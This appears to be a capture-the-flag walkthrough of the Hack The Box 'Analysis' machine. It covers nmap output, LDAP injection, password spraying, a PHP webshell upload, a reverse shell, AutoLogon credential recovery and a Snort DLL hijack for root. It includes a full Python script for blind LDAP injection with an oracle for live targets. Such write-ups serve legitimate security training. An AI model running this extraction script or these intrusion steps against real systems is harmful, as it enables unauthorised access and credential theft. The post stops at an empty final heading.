In this post, I would like to share a walkthrough of the Analysis machine from Hack The Box.
This machine is rated Hard on Hack The Box.

What will you gain from the Analysis machine?
For the user flag, you must exploit a PHP website that uses LDAP to query user information from Active Directory. First, LDAP injection is used to enumerate user accounts; the same injection then reads a shared account's description field, which contains a password. That password grants access to the admin panel, whose upload feature can be abused in two ways: uploading a webshell and executing an HTA file. Credentials for the next user are then found in the AutoLogon registry values and the web server logs.
For the root flag, you exploit Snort's dynamic preprocessor feature by crafting a malicious DLL and placing it where Snort will load it.
Information Gathering on Analysis Machine
Once the VPN connection is up (the configuration file is downloaded from Hack The Box), we can start with an nmap scan.
┌─[darknite@parrot]─[~/Documents/htb]
└──╼ $nmap -sC -sV 10.10.11.250 -oA initial
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-01 07:23 EDT
Nmap scan report for 10.10.11.250
Host is up (0.28s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-01 11:23:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3306/tcp open mysql MySQL (unauthorized)
Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-06-01T11:24:07
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.49 seconds
┌─[darknite@parrot]─[~/Documents/htb]
└──╼ $
Let's start with the website on port 80.

There is nothing on the web interface that can be abused.

Directory brute-forcing also turns up nothing useful.

Therefore, let's enumerate subdomains (virtual hosts) of analysis.htb, the domain nmap reported on the LDAP ports.

The internal subdomain responds with "403: Forbidden, Access is denied".

Further enumeration under the internal subdomain reveals a PHP file.

Requesting it without arguments returns the error "missing parameter".

Probing that parameter with LDAP injection payloads turns up a potential username: technician.

Another potential username appears the same way; we keep it for later.

The server's response confirms that the injected filter is being evaluated.

Accessing login.php under the employees directory gives us a login page.
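The blind extraction described above, as an added worked example that is not code from the original post: the script assumes the vulnerable endpoint is list.php with a parameter named name, and that the server pastes the value straight into an LDAP filter. A constructed in-memory directory and a tiny filter evaluator stand in for the real server so the script runs offline; http_oracle shows how the same logic is pointed at a live target.

```python
"""Blind LDAP injection against a user-lookup page.

Added worked example, not code from the original post. It assumes the
vulnerable endpoint is list.php?name=<value> and that the server pastes the
value straight into an LDAP filter. Because the page only reveals whether
*some* directory entry matched, usernames and the description attribute are
recovered one character at a time with wildcard prefixes.
"""
import string
from typing import Callable

# Characters to try. '*', '(', ')' and '\' are excluded because they have
# meaning inside an LDAP filter and would break the injected expression.
SAFE_CHARS = string.ascii_lowercase + string.digits + "!@#$%^&_-+=.,:;?"

# --- Simulated vulnerable server (constructed sample data, offline) ---------
FAKE_DIRECTORY = [
    {"objectClass": "user", "name": "technician", "description": "Pa55w0rd!"},
    {"objectClass": "user", "name": "jdoe", "description": ""},
    {"objectClass": "user", "name": "amanson", "description": "Analyst"},
]


def vulnerable_filter(user_input: str) -> str:
    """The injection pattern: untrusted input concatenated into the filter."""
    return f"(&(objectClass=user)(name={user_input}))"


def _parse(f: str, i: int = 0):
    """Recursive-descent parser for the filter subset used here:
    (&...), (|...) and (attr=value) where value may end in '*'."""
    i += 1                                   # skip '('
    if f[i] in "&|":
        op, i, subs = f[i], i + 1, []
        while f[i] == "(":
            node, i = _parse(f, i)
            subs.append(node)
        return (op, subs), i + 1             # skip ')'
    eq = f.index("=", i)
    close = f.index(")", eq)
    return ("=", f[i:eq], f[eq + 1:close]), close + 1


def _match(node, entry: dict) -> bool:
    """Evaluate a parsed filter the way AD does: case-insensitive,
    trailing '*' is a prefix match, an absent/empty attribute never matches."""
    if node[0] == "&":
        return all(_match(n, entry) for n in node[1])
    if node[0] == "|":
        return any(_match(n, entry) for n in node[1])
    _, attr, value = node
    actual = entry.get(attr, "").lower()
    value = value.lower()
    if value.endswith("*"):
        return actual != "" and actual.startswith(value[:-1])
    return actual == value


def fake_oracle(user_input: str) -> bool:
    """Stand-in for the HTTP request: True when the page would show a hit."""
    tree, _ = _parse(vulnerable_filter(user_input))
    return any(_match(tree, e) for e in FAKE_DIRECTORY)


def http_oracle(url: str, marker: str) -> Callable[[str], bool]:
    """Oracle for a live target (assumed URL and parameter name).
    `marker` is a string present in the response only when a user matched;
    pick it by comparing a known-good and a known-bad request first."""
    import requests                          # only needed for live use
    session = requests.Session()

    def oracle(payload: str) -> bool:
        r = session.get(url, params={"name": payload}, timeout=10)
        return marker in r.text
    return oracle


def enumerate_users(oracle, charset=SAFE_CHARS, max_len=32):
    """Walk the prefix tree: a*, ab*, ... Each matching prefix is extended;
    a prefix that also matches without the wildcard is a complete name.
    AD compares case-insensitively, so names come back lowercase."""
    found, stack = [], [""]
    while stack:
        prefix = stack.pop()
        if prefix and oracle(prefix):
            found.append(prefix)
        if len(prefix) < max_len:
            stack.extend(prefix + c for c in charset if oracle(prefix + c + "*"))
    return sorted(found)


def extract_attribute(oracle, username, attr="description",
                      charset=SAFE_CHARS, max_len=64):
    """Read another attribute of one user by closing the name clause and
    adding a second condition to the AND: name=<user>)(<attr>=<prefix>c*"""
    value = ""
    while len(value) < max_len:
        for c in charset:
            if oracle(f"{username})({attr}={value}{c}*"):
                value += c
                break
        else:
            break                            # nothing extends it: done
    return value


if __name__ == "__main__":
    print("users:", enumerate_users(fake_oracle))
    print("technician description:", extract_attribute(fake_oracle, "technician"))
```

Because Active Directory matches these attributes case-insensitively, everything recovered is lowercase; when the description turns out to be a password, try the obvious case variants before giving up. Against a live target, replace fake_oracle with http_oracle(url, marker) after confirming which string in the response distinguishes a hit from a miss.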
Spraying the usernames and passwords on the Analysis machine

The screenshot above shows the list of usernames we can use for the next step.

Spraying takes a few minutes, depending on the connection to the machine.

Eventually we obtain a valid set of login credentials.

Logging in presents us with the dashboard shown above.

A minimal PHP webshell, one that executes a command supplied in a request parameter, is enough for the next step.

Let's upload that file through the site's upload.php function.

The error returned after the upload suggests that the file was nonetheless stored.

Testing command execution through the webshell succeeds.

Issuing a reverse-shell command through the webshell gives us a connection back to our listener.

However, the machine's output language is not English.

After some searching, I located the PHP file we found earlier.

The screenshot above shows the source code of list.php.

We also need to look into the employees directory.

Inside it we find a credential that looks like a MySQL database password.

With it, let's obtain another shell using the command above.

Finally, we get a new reverse shell connection back to us.

Let's upload PrivescCheck.ps1, which can be found here.

Then let's execute it with the command above.

After a while, the script reveals jdoe's credentials (stored in the AutoLogon registry values).

These credentials work with evil-winrm.

We can read the user flag by typing the “type user.txt” command
Escalating to Root Privileges

I noticed a suspicious snort directory; Snort is rarely installed on a target machine, so this stands out.

Two directories are stored within the snort directory.

More importantly, the directory is writable, so we can drop a malicious file into it.

Let's start our listener on the attacker machine.

Next, let's generate a malicious payload saved in DLL format.

Then we upload the DLL to the victim machine, into the directory from which Snort loads its dynamic preprocessors.

It takes a while for Snort to load the DLL and for the reverse shell to connect back to the attacker machine.

Boom! At last, we have a root shell.

We can read the root flag by typing the "type root.txt" command.
Another way to get a root shell on the machine
